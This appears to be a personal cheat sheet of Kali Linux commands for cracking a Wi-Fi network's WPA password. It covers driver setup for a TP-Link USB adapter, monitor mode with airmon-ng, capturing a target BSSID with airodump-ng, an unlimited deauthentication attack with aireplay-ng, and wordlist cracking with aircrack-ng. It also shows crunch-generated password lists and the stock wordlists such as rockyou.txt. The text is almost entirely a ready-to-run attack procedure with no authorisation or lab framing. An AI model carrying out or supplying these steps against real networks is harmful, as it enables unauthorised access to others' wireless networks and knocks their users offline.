NOTE: DONT FORGOT TO INSERT THE WIFI DEVICE IN USB 2.0 AND NOT USB 3.0, IF YOU INSERT IN 3.0 IT WILL THROW NETWORK DOWN AFTER FEW SECONDS OF AIRODUMP-NG ETC..
go to hardinfo2->usb menu to see which port is usb 2.0
1. make sure internet is working and isntall the below driver for TP link - TL-wn722N 150 mbps usb adaptor
apt update
sudo apt install -y realtek-rtl8188eus-dkms
init 6 //restart
STEPS
airmon-ng start wlan1
airodump-ng wlan1
#if no bssi is display, then use the below command
ifconfig wlan1 down
ifconfig wlan1 up
airudump-ng wlan1
airodump-ng --bssid <64:2C:AC:D0:0B:AA> --channel <1> --write <capturefilename> <wlan1>
new tab -> aireplay-ng --deauth 0 -a <64:2C:AC:D0:0B:AA> wlan1
aircrack-ng -b <64:2C:AC:D0:0B:AA> -w <passwordfile.txt> <Capture-Pat-1.cap>
additional
1. to generate the password list in sequence. below example starts air00001 to air99999
crunch 8 8 -t air%%%%% -o passwordlist.txt
2. to get all wordlists text file
wordlists -h
/usr/share/wordlists
├── amass -> /usr/share/amass/wordlists
├── dirb -> /usr/share/dirb/wordlists
├── dirbuster -> /usr/share/dirbuster/wordlists
├── dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt
├── fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt
├── fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists
├── john.lst -> /usr/share/john/password.lst
├── legion -> /usr/share/legion/wordlists
├── metasploit -> /usr/share/metasploit-framework/data/wordlists
├── nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst
├── rockyou.txt
├── sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt
├── wfuzz -> /usr/share/wfuzz/wordlist
└── wifite.txt -> /usr/share/dict/wordlist-probable.txt